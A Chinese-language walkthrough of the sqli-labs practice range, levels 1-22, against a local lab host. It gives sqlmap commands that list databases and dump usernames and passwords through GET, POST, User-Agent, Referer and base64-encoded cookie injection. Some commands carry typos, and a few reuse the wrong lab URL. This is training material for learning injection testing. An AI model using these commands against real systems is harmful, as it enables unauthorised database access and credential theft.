SQLmap过sql-libs靶场Page-1(1-22)
1. Less-1
(1) 查看数据库
1 | sqlmap -u "http://192.168.1.3/sql-libs/Less-1/?id=1" -dbs |
得到这几个数据库
(2) 查看数据表
比如我们想看security
这个数据库下有什么表
1 | sqlmap -u "http://192.168.1.3/sql-libs/Less-1/?id=1" -D security --tables |
(3) 查看表中字段
我们看users
表下的字段内容
1 | sqlmap -u "http://192.168.1.3/sql-libs/Less-1/?id=1" -D security -T users --columns |
(4) 查看字段值
查看security
数据库下的users
表里的id
、password
、username
有哪些值
1 | sqlmap -u http://192.168.1.3/sql-libs/Less-1/?id=1 -D security -T users --columns id,password,username --dump |
第一题结束
2. Less-2
和第一题一样。套代码就行了.
1 | sqlmap -u "http://192.168.1.3/sql-libs/Less-2/?id=1" -dbs |
3. Less-3
1 | sqlmap -u "http://192.168.1.3/sql-libs/Less-3/?id=1" -dbs |
4. Less-4
一样……
5. Less-5
一样……
6. Less-6
一样……
7. Less-7
一样……
8. Less-8
一样……
9. Less-9
一样……
10. Less-10
出现了一些变化
套路不好使了,我们试试level2
1 | sqlmap -u "http://192.168.1.3/sql-libs/Less-10/?id=1" -level=2 -dbs |
后面就一样了,加上 -level=2
就行了。
11. Less-11
11题是一个登录界面,需要使用--data
来定义payload的内容
先抓包找一下参数
有这三个参数
这道题不用加id
1 | sqlmap -u "http://192.168.1.3/sql-libs/Less-11/" --data "uname=1&passwd=11&submit=Submit" --dbs |
剩下的简单了。
加上 --data "uname=1&passwd=11&submit=Submit"
就行了
1 | sqlmap -u "http://192.168.1.3/sql-libs/Less-11/" --data "uname=1&passwd=11&submit=Submit" -D security -T users id,password,username -dump |
12. Less-12
和11题一样
13. Less-13
和11题一样
14. Less-14
和11题一样
15. Less-15
和11题一样,由于用到时间盲注,可能会很长时间
16. Less-16
套路不行,加-level=2
1 | sqlmap -u "http://192.168.1.3/sql-libs/Less-11/" --data "uname=1&passwd=11&submit=Submit" -D security -T users id,password,username -dump -level=2 |
17. Less-17
这道题已知账号是admin,其他和之前一样。
这道题我最后获取字段数据的时候,结果是NULL,然后用脚本跑出来了。
脚本在开头的那篇文章里。
18. Less-18
这道题的前提是知道账号和密码,要不然做不出来
账号:Dumb,密码:Dumb
这是一个header注入。注入点在UA里
得到数据库信息
1 | sqlmap -u "http://192.168.1.3/sql-libs/Less-18/" --data="uname=Dumb&passwd=Dumb、&submit=Submit" --user-agent="*" --thread=10 --dbs |
其他的就一样了。
1 | sqlmap -u "http://192.168.1.3/sql-libs/Less-18/" --data="uname=Dumb&passwd=Dumb、&submit=Submit" --user-agent="*" --thread=10 -D security -T users --columns id,password,username --dump |
如果得不到数据,或者报错就重刷数据库。
19. Less-19
这道题注入点在referer中
1 | sqlmap -u "http://192.168.1.3/sql-libs/Less-19/" --data="uname=admin&passwd=admin&submit=Submit" --referer="*" --thread=10 --dbs |
其他的也一样,改语句就行。
如果得不到数据,或者报错就重刷数据库。
20. Less-20
这道题注入点是在cookie
1 | sqlmap -u http://192.168.1.3/sql-libs/Less-20/index.php --cookie="uname=admin" --dbs -level=2 |
其他的一样。
21. Less-21
还是cookie注入,但是用来base64编码。
我们用--tamper "base64encode.py"
来加密。
1 | sqlmap -u http://192.168.1.3/sql-libs/Less-21/index.php --cookie="uname=*" --dbs --tamper "base64encode.py" |
22. Less-22
和21题一样。
评论